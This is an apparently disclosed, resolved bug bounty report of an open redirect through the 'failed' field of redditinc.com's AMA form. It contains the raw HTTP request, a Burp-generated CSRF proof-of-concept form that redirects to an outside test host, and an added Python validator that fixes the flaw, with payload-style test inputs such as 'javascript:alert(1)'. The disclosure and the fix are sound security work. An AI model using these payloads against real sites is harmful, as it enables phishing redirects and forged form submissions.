Open Redirect on www.redditinc.com via `failed` query param
Medium
Reddit
Reported by
lu3ky-13
Vulnerability Details
Technical details and impact analysis
Hello dear support,
I have found the issue on https://www.redditinc.com/ama
HTTP request
```http
POST /ama HTTP/1.1
Content-Type: multipart/form-data; boundary=----------YWJkMTQzNDcw
Cookie: CRAFT_CSRF_TOKEN=958b77eaad06452d68f0be48c5edf5b0d928b51a6c4afbb5f2f95397f18b43e2a%3A2%3A%7Bi%3A0%3Bs%3A16%3A%22CRAFT_CSRF_TOKEN%22%3Bi%3A1%3Bs%3A40%3A%22jZdkLxGgRNVPWIF2OyxH-Lig9pTukLSS8OxYOVST%22%3B%7D;OptanonAlertBoxClosed=2021-07-12T01:35:46.350Z;OptanonConsent=isIABGlobal=false&datestamp=Mon+Jul+12+2021+04%3A35%3A46+GMT%2B0300+(Arabian+Standard+Time)&version=6.13.0&hosts=&consentId=71f221d5-8a57-4a90-9844-0a863bfc837d&interactionCount=2&landingPath=NotLandingPage&groups=C0001%3A1%2CC0002%3A1%2CC0004%3A1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 1508
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4298.0 Safari/537.36
Host: www.redditinc.com
Connection: Keep-alive

------------YWJkMTQzNDcw
Content-Disposition: form-data; name="action"

zendesk/default/submit
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="agreement"

yes
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="description"

555
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="email"

[email protected]
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="email_confirm"

[email protected]
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="failed"

http://xfs.bxss.me
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="name"

pHqghUme
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="organization"

Acunetix
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="participants"

pHqghUme
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="redirect"

74bcbfb4f9c047fb4e467dd203ca3b30f2b31216551ab9db2bf44911c029d506thank-you/ama-form-step-1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="subject"

AMA Request
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="success"

thank-you/ama-form-step-1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="ticket_form_id"

360000307211
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="timeframe"

next-week
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="timezone"

(GMT-05:00) Eastern Time (US & Canada)
------------YWJkMTQzNDcw--
```
===============================================================

Vuln here:

```http
Content-Disposition: form-data; name="failed"

http://xfs.bxss.me
------------YWJkMTQzNDcw
```
CSRF PoC
```html
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://www.redditinc.com/ama" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="action" value="zendesk/default/submit" />
      <input type="hidden" name="agreement" value="yes" />
      <input type="hidden" name="description" value="555" />
      <input type="hidden" name="email" value="sample@email.tst" />
      <input type="hidden" name="email_confirm" value="sample@email.tst" />
      <input type="hidden" name="failed" value="http://0bc7dpd4u9tmsh9ruo3n8644pvvlja.burpcollaborator.net" />
      <input type="hidden" name="name" value="pHqghUme" />
      <input type="hidden" name="organization" value="Acunetix" />
      <input type="hidden" name="participants" value="pHqghUme" />
      <input type="hidden" name="redirect" value="74bcbfb4f9c047fb4e467dd203ca3b30f2b31216551ab9db2bf44911c029d506thank-you/ama-form-step-1" />
      <input type="hidden" name="subject" value="AMA Request" />
      <input type="hidden" name="success" value="thank-you/ama-form-step-1" />
      <input type="hidden" name="ticket_form_id" value="360000307211" />
      <input type="hidden" name="timeframe" value="next-week" />
      <input type="hidden" name="timezone" value="(GMT-05:00) Eastern Time (US &amp; Canada)" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
```
{F1373178}
## Impact
Cross-Site Request Forgery (CSRF) To Open Redirect
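The root cause the report points at is that the `failed` (and `success`) form fields are taken as redirect targets without being restricted to the site's own origin. Below is an added example of the server-side check that closes that gap; it is editor-written illustration code, not Craft CMS or Reddit code, and it assumes a fallback landing path of `/ama` and an allow-list containing only `www.redditinc.com`:

```python
"""Validate a user-supplied post-submit redirect target (e.g. the `failed`
and `success` form fields) so that only same-site paths are honoured.

Added example; DEFAULT_PATH and ALLOWED_HOSTS are assumptions for this page.
"""
from urllib.parse import urlsplit

DEFAULT_PATH = "/ama"                   # assumed fallback landing page
ALLOWED_HOSTS = {"www.redditinc.com"}   # the site's own host(s)


def safe_redirect_path(candidate: str, default: str = DEFAULT_PATH) -> str:
    """Return a site-relative path ("/...") derived from `candidate`, or
    `default` when the candidate would leave the site.

    Defensive rules, mirroring how browsers parse a Location target:
      * drop TAB/CR/LF, which browsers ignore inside URLs
      * treat backslashes as slashes, as browsers do ("/\\host" == "//host")
      * allow only http(s) schemes; "javascript:" etc. fall back to default
      * an explicit host must be in ALLOWED_HOSTS (userinfo tricks such as
        "http://www.redditinc.com@evil" resolve to hostname "evil")
      * always emit a path with exactly one leading "/", so "//host" and
        "///host" can never be re-read as a protocol-relative URL
    """
    if not isinstance(candidate, str) or not candidate:
        return default
    cleaned = "".join(ch for ch in candidate if ch not in "\t\r\n")
    cleaned = cleaned.replace("\\", "/").strip()
    parts = urlsplit(cleaned)
    if parts.scheme and parts.scheme not in ("http", "https"):
        return default
    if parts.netloc:
        host = (parts.hostname or "").lower()
        if host not in ALLOWED_HOSTS:
            return default
    # Rebuild from components we control: single leading slash + path + query.
    path = "/" + parts.path.lstrip("/")
    if parts.query:
        path += "?" + parts.query
    return path


if __name__ == "__main__":
    # Values taken from the report's request, plus a few browser-parsing edge cases.
    for value in ["http://xfs.bxss.me", "thank-you/ama-form-step-1",
                  "//xfs.bxss.me", "/\\xfs.bxss.me", "javascript:alert(1)"]:
        print(f"{value!r:40} -> {safe_redirect_path(value)}")
```

With this in place the `failed` value from the PoC (`http://xfs.bxss.me`) resolves to `/ama`, while the legitimate `thank-you/ama-form-step-1` value still works.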
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Weakness
Open Redirect